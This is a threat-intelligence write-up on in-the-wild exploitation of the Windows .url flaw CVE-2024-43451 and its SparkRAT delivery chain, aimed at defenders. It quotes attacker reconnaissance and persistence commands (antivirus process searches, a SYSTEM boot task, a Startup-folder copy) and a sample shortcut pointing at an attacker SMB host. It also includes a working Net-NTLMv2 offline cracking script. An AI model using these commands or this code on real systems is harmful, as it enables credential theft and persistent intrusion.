Dec 16th, 2024
@fkxdr

How CVE-2024-43451 is exploited in the wild

CVE-2024-43451 is a zero-day vulnerability in the way Windows handles .url (Internet Shortcut) files. Microsoft classifies it as an NTLM hash disclosure spoofing vulnerability: with minimal user interaction, a crafted .url file makes the victim's machine authenticate to an attacker-controlled server and disclose the user's NTLMv2 response. First discovered in June 2024, it was observed in targeted attacks against Ukrainian entities, likely by the Russian-linked threat actor UAC-0194. The attackers used it to trigger outbound SMB connections, capture NTLMv2 hashes, and distribute malware such as SparkRAT and Redline Stealer.

This exploit was detected through malicious downloads hosted on an official Ukrainian government website, indicating a targeted campaign. Microsoft fixed the vulnerability in its November 2024 Patch Tuesday update.

Exploitation Mechanics

CVE-2024-43451 was first detected on June 21st, 2024, through a suspicious .zip file hosted on a legitimate Ukrainian government website (hXXps[://]doc[.]osvita-kp[.]gov[.]ua/uploads/53/199804/humeniuk_liubov_stanislavivna[.]zip), uploaded by an unregistered user from Ukraine. This is an official Ukrainian government site belonging to the department of education and science.

The file details are:
File name: humeniuk_liubov_stanislavivna[.]zip
File type: ZIP
SHA-256: 07b417ffa08f12201eceba3688690bd5c947f657be00e3c883f6ec342ec5c344

As of today, 26 security vendors on VirusTotal flag this file as malicious.

This file contained two components:

  1. A PDF file containing academic certification details
  2. A malicious .url (internet shortcut) file

The PDF file included in the malicious .zip archive appears to be innocuous at first glance. It contains an academic diploma purportedly issued by the Odesa Polytechnic National University, with personal details matching the file name in the ZIP (humeniuk_liubov_stanislavivna). This diploma is formatted in Ukrainian and features institution branding to reinforce its authenticity.

Upon right-clicking, deleting, or moving the .url file, a connection is automatically established to a remote server (92[.]42[.]96[.]30), enabling credential capture and potential malware installation. The exploit works because Windows resolves the shortcut's file:// target as a network path and contacts that host over SMB, authenticating as the current user, without the user ever opening the shortcut.

The vulnerability is triggered by embedding a remote file:// path in the .url file:

  • The URL file includes a line of the form URL=file://XXX.XXX.XXX.XXX
  • A single right-click or move action makes Windows contact the attacker's host over SMB, leaking the user's NTLMv2 response

The .url file's appearance was deliberately made to look harmless by customizing its icon: the metadata specifies IconFile=C:\Windows\System32\SHELL32.dll, so Explorer shows a standard system icon instead of the shortcut's default one.
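As an added example (written for this write-up, not taken from the post or the campaign), the following Python script parses a .url file and flags any of the keys Explorer resolves as paths (URL, IconFile, WorkingDirectory) that point at a remote host, which is exactly the condition that makes Windows open an SMB connection. The three sample shortcuts are constructed after the pattern described above; the IP in the first one is the SMB host named in this post.

```python
"""Triage Windows .url (Internet Shortcut) files for remote file:// or UNC targets.

Added example for this write-up, not code from the post or the campaign.
A .url file is an INI file with an [InternetShortcut] section. Explorer
resolves URL=, IconFile= and WorkingDirectory= as paths, so a value naming
a remote host makes Windows open an SMB connection (and authenticate) to it.
"""
from ipaddress import ip_address
from urllib.parse import urlparse

# Keys whose value the shell may resolve as a path (lower-cased for matching).
PATH_KEYS = ("url", "iconfile", "workingdirectory")

# Constructed samples modelled on the pattern described in the text.
MALICIOUS = r"""[InternetShortcut]
URL=file://92.42.96.30/share/
IconFile=C:\Windows\System32\SHELL32.dll
IconIndex=1
"""
BENIGN = r"""[InternetShortcut]
URL=https://example.com/docs
IconFile=C:\Windows\System32\SHELL32.dll
IconIndex=13
"""
UNC_ICON = r"""[InternetShortcut]
URL=https://example.com/
IconFile=\\10.0.0.5\share\icon.ico
"""


def parse_internet_shortcut(text):
    """Return the key/value pairs of the [InternetShortcut] section."""
    values, section = {}, None
    for raw in text.splitlines():
        line = raw.lstrip("\ufeff").strip()          # tolerate a UTF-8 BOM
        if not line or line[0] in ";#":
            continue
        if line[0] == "[" and line[-1] == "]":
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip()] = value.strip()
    return values


def remote_host(value):
    """Host a path value would make Windows contact, or None for local paths."""
    v = value.strip().strip('"')
    if v.startswith("\\\\"):                         # UNC: \\host\share\...
        return v[2:].split("\\", 1)[0].split("/", 1)[0] or None
    if v.lower().startswith("file:"):
        parsed = urlparse(v)
        if parsed.netloc:                            # file://host/share/...
            return parsed.netloc
        if parsed.path.startswith("//"):             # file:////host/share/...
            return parsed.path[2:].split("/", 1)[0] or None
    return None                                      # http(s):, C:\..., etc.


def is_external(host):
    """True/False for IP literals (is the target outside private space), None for names."""
    try:
        return ip_address(host).is_global
    except ValueError:
        return None


def triage_url_file(text):
    """Flag every path-like key that points at a remote host."""
    values = parse_internet_shortcut(text)
    findings = []
    for key, value in values.items():
        if key.lower() not in PATH_KEYS:
            continue
        host = remote_host(value)
        if host:
            findings.append({"key": key, "value": value, "host": host,
                             "external": is_external(host)})
    return {
        "suspicious": bool(findings),
        "findings": findings,
        # Icon masquerade is not a finding by itself, but the analyst wants to see it.
        "icon": (values.get("IconFile"), values.get("IconIndex")),
    }


if __name__ == "__main__":
    for name, sample in (("MALICIOUS", MALICIOUS), ("BENIGN", BENIGN), ("UNC_ICON", UNC_ICON)):
        print(name, triage_url_file(sample))
```

Run it over every .url extracted from mail attachments or archives; a hit with an external IP literal is the pattern this post describes, while a UNC path to an internal host is still worth a look because the same authentication happens inside the network.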

Several IP addresses have been linked to the attack, with primary communications occurring through the following:

  • 92[.]42[.]96[.]30: Previously owned by Saltu[.]Cloud until August 2024. This is the SMB host that the malicious .url file contacts.
  • 92[.]42[.]96[.]10: Another IP from the same range, likely part of the broader malicious infrastructure.
  • 89[.]23[.]102[.]251: Used in secondary stages of the attack.
  • 77[.]83[.]172[.]47: This IP is specifically associated with SparkRAT malware, utilized later in the attack chain for persistence and communication with the attackers.

The infrastructure supporting the CVE-2024-43451 exploitation campaign seems closely tied to a Russian-based Virtual Private Server (VPS) provider, Saltu[.]Cloud. This company is known for its anonymity-focused services, including accepting cryptocurrency payments and offering communication channels via Telegram.

  • Email: abuse@saltu.cloud, noc@altawk.com (technical/admin), and mail@saltu.cloud.
  • Registrant city: Warsaw.

When the .url file is interacted with, the system automatically tries to authenticate to the remote SMB server at 92[.]42[.]96[.]30 with the logged-in user's credentials. What the attacker's server captures is the NTLMv2 challenge-response (Net-NTLMv2): an HMAC computed from the user's NT hash over the server's challenge, not the NT hash itself. That distinction matters for what comes next. A Net-NTLMv2 response cannot be replayed in a classic pass-the-hash attack, but it can be cracked offline to recover the password, or relayed in real time to another service that accepts NTLM (for example SMB or LDAP without signing) to act as the victim.

The simplicity of this step makes it particularly dangerous: no file execution is required, and no warning is shown to the user. At this stage the attackers gain their first foothold and, if relaying succeeds or the password is recovered, can begin lateral movement across the network.
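To make the distinction concrete, here is an added example (written for this post, not code from the author or the campaign) that builds a Net-NTLMv2 response the way a Windows client does and runs an offline dictionary check against it. User, domain, password, server challenge and client blob are constructed values. The derivation follows MS-NLMP: NT hash = MD4(UTF-16LE(password)), NTLMv2 key = HMAC-MD5(NT hash, UPPER(user) + domain), NTProofStr = HMAC-MD5(key, server challenge + client blob). MD4 is implemented inline because hashlib frequently lacks it on OpenSSL 3 builds.

```python
"""What the leaked value is and what it allows.

Added example for this write-up, not code from the post. It builds a
Net-NTLMv2 response the way a Windows client does (MS-NLMP) and runs an
offline dictionary check against it. User, domain, password, server
challenge and client blob are constructed values, not data from the campaign.
"""
import hashlib
import hmac
import struct


def md4(data):
    """Pure-Python MD4 (RFC 1320); hashlib often lacks md4 on OpenSSL 3 builds."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19),
         range(16)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[idx] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)): what pass-the-hash needs, never sent on the wire."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_key(password, user, domain):
    """NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) + domain)."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"),
                    hashlib.md5).digest()


def nt_proof(password, user, domain, server_challenge, blob):
    """NTProofStr = HMAC-MD5(NTOWFv2, server challenge || client blob): the 16 bytes captured."""
    return hmac.new(ntlmv2_key(password, user, domain), server_challenge + blob,
                    hashlib.md5).digest()


# Constructed capture: what an attacker's SMB listener records (not campaign data).
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
BLOB = (b"\x01\x01" + bytes(6)                    # RespType, HiRespType, reserved
        + bytes(8)                                 # timestamp (zeroed for the example)
        + bytes.fromhex("aabbccddeeff0011")        # client challenge
        + bytes(4) + bytes(4) + bytes(4))          # reserved, empty AV_PAIR list, reserved


def example_capture(password="Winter2024!"):
    """Simulate the leak for user j.doe in domain CORP; the attacker never sees the password."""
    cap = {"user": "j.doe", "domain": "CORP", "challenge": SERVER_CHALLENGE, "blob": BLOB}
    cap["proof"] = nt_proof(password, cap["user"], cap["domain"], SERVER_CHALLENGE, BLOB)
    return cap


def hashcat_line(cap):
    """hashcat mode 5600 (NetNTLMv2) input: user::domain:challenge:proof:blob."""
    return "%s::%s:%s:%s:%s" % (cap["user"], cap["domain"], cap["challenge"].hex(),
                                cap["proof"].hex(), cap["blob"].hex())


def crack(cap, candidates):
    """Offline dictionary attack: recompute NTProofStr per guess and compare."""
    for guess in candidates:
        if hmac.compare_digest(nt_proof(guess, cap["user"], cap["domain"],
                                        cap["challenge"], cap["blob"]), cap["proof"]):
            return guess
    return None


if __name__ == "__main__":
    cap = example_capture()
    print(hashcat_line(cap))
    print("recovered:", crack(cap, ["password", "Summer2023", "Winter2024!"]))
```

The attacker learns proof, challenge and blob from the SMB exchange but never the NT hash, so they cannot start a fresh NTLM session as the user on their own. The realistic follow-ons are therefore cracking (hashcat mode 5600 consumes exactly the line hashcat_line builds) or relaying the live exchange to a service without signing, which is why SMB and LDAP signing matter as mitigations.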

Once the SMB connection is established, the shortcut is used to pull the malicious executables from the attacker's server:

  • Certificate_Activate_45052389_005553.exe
  • Certificate+AF8hFgBf-45052389+AF8-005553.exe (a UTF-7 rendering of the same naming scheme: +AF8- decodes to an underscore and +AF8hFgBf- to "_№_")

Once downloaded and executed, the EXE pretends to serve a legitimate purpose. To reinforce the illusion, it displays a misleading message:

„The certificate has been activated and sent to the government system.“

Behind the scenes, however, the executable drops additional malicious scripts and tools onto the system. The file carries a code signature in the name of Jiangxia Information Technology (Huizhou) Co. that does not verify.

Upon execution of the EXE file, the attackers deploy a secondary script named Learn[.]cmd. This batch script uses obfuscated commands to evade detection while performing reconnaissance and environment checks. It executes the following actions:

  1. Enumerates running processes with tasklist.exe to identify active antivirus or security tools.
  2. Searches the process list for specific antivirus-related processes, such as avastui.exe, avgui.exe, sophoshealth.exe, and others.
  3. Prepares the final payload from a file named „Cornwall“: findstr /V prints every line of that file except those containing the marker string RealizedLivingFiredVotes, which strips the marker lines from the carrier file and leaves the embedded executable (the file begins with an executable header).

    tasklist.exe
    findstr /I avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe
    findstr /I "wrsa.exe opssvc.exe"
    findstr /V "RealizedLivingFiredVotes" Cornwall

Once the system environment is assessed and security defenses are evaluated, the attackers deliver the final payload: SparkRAT, an open-source Remote Access Trojan (RAT) that gives them full control over the compromised machine (https://github.com/XZB-1248/Spark/).

  1. The malicious executable launches SparkRAT, delivered through obfuscated scripts or loaded directly into memory.
  2. SparkRAT establishes a command-and-control (C2) connection to the attacker's server at 77[.]83[.]172[.]47 over port 8000.

The attackers employ a multi-layered strategy to maintain persistent control over the compromised system.

The malware creates a scheduled task that masquerades as a legitimate process. This task is set to run automatically every time the system starts. By embedding it within the Windows Task Scheduler, the attackers ensure that their payload executes consistently.
For instance, a task named „Wave360 Sync Technologies Co\SyncWave360.js“ points to the malicious script located in a public directory:

schtasks /create /tn "Wave360 Sync Technologies Co\SyncWave360.js" /tr "C:\Users\Public\SyncWave360.js" /sc ONSTART /ru SYSTEM

In addition to the scheduled task, the RAT places a copy of itself into the Windows Startup folder. Because the destination is the all-users Startup folder under C:\ProgramData, the payload runs whenever any user logs on, not just the original victim. The file SyncWave360.js is copied as follows:

copy "C:\Users\Public\SyncWave360.js" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SyncWave360.js"
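Both the reconnaissance commands in Learn.cmd and the two persistence commands above leave distinctive process-creation records. As an added example (written for this write-up, not tooling from the post), the following Python rules run over constructed records shaped like Sysmon Event ID 1 (Image, CommandLine) that contain the exact command lines quoted in this post plus two benign look-alikes; the writable-directory list and the rule wording are assumptions made for illustration.

```python
"""Flag the reconnaissance and persistence command lines this post describes
in process-creation telemetry.

Added example for this write-up, not tooling from the original post. It runs
over constructed records shaped like Sysmon Event ID 1 (Image, CommandLine);
the directory list and the rule thresholds are assumptions for illustration.
"""
import re

SCRIPT_EXT = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".cmd", ".bat", ".ps1")
WRITABLE_DIRS = (r"c:\users\public", r"c:\programdata", r"c:\windows\temp", r"\appdata\local\temp")
STARTUP_DIR = r"\start menu\programs\startup"
# Process names Learn.cmd greps for, taken from the findstr lines quoted in the text.
AV_PROCESSES = {"avastui.exe", "avgui.exe", "nswscsvc.exe", "sophoshealth.exe", "wrsa.exe", "opssvc.exe"}

# Constructed events: the command lines from the post plus benign look-alikes.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "Wave360 Sync Technologies Co\SyncWave360.js" '
                    r'/tr "C:\Users\Public\SyncWave360.js" /sc ONSTART /ru SYSTEM'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c copy "C:\Users\Public\SyncWave360.js" '
                    r'"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SyncWave360.js"'},
    {"Image": r"C:\Windows\System32\findstr.exe",
     "CommandLine": r"findstr /I avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"},
    # Benign look-alikes that must not fire.
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "VendorBackup" /tr "C:\Program Files\Vendor\backup.exe" /sc DAILY'},
    {"Image": r"C:\Windows\System32\findstr.exe",
     "CommandLine": r"findstr /I error C:\logs\app.log"},
]


def tokens(cmdline):
    """Split a Windows command line, keeping quoted arguments together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def arg_after(toks, flag):
    """Value following a switch such as /tr, or None if absent."""
    low = [t.lower() for t in toks]
    if flag in low and low.index(flag) + 1 < len(toks):
        return toks[low.index(flag) + 1]
    return None


def detect(event):
    """Return the list of rule names an event triggers (empty for clean events)."""
    hits = []
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    toks = tokens(event["CommandLine"])
    low = [t.lower() for t in toks]
    cmd_lower = event["CommandLine"].lower()

    if image == "schtasks.exe" and "/create" in low:
        action = (arg_after(toks, "/tr") or "").lower()
        if action.endswith(SCRIPT_EXT) or any(d in action for d in WRITABLE_DIRS):
            hits.append("schtasks: task action is a script or lives in a user-writable directory")
        run_as = (arg_after(toks, "/ru") or "").lower()
        schedule = (arg_after(toks, "/sc") or "").lower()
        if run_as == "system" and schedule in ("onstart", "onlogon"):
            hits.append("schtasks: boot/logon task running as SYSTEM")

    if STARTUP_DIR in cmd_lower and any(op in low for op in ("copy", "xcopy", "move", "robocopy")):
        hits.append("persistence: file copied into the all-users Startup folder")

    if image == "findstr.exe" and AV_PROCESSES & set(low):
        hits.append("recon: process list searched for security products")
    return hits


def scan(events):
    """Return (index, hits) for every event that triggers at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = detect(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["CommandLine"])
        for h in hits:
            print("   ", h)
```

The schtasks rule fires twice on the task from this post (script action in C:\Users\Public, and ONSTART as SYSTEM), which is a useful property for scoring: either condition alone is noisy in some environments, both together rarely are.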

Further searches identified dozens of similarly crafted .url files exploiting the same vulnerability to deploy tools like SparkRAT and Redline Stealer – suggesting that either multiple threat actors are leveraging this flaw or a single attacker is experimenting with different payloads.

This broad visibility indicates that CVE-2024-43451 is being actively exploited across targeted regions and possibly shared within underground communities, emphasizing the need for timely patching, monitoring, and proactive defense. Organizations should apply Microsoft's November 2024 patch promptly, block outbound SMB (TCP 445) to the internet at the perimeter and on endpoints, harden NTLM (enforce SMB and LDAP signing and restrict NTLM where possible, so that a captured response can be neither relayed nor easily reused), and rely on behavioral detection to catch the post-exploitation activity described above.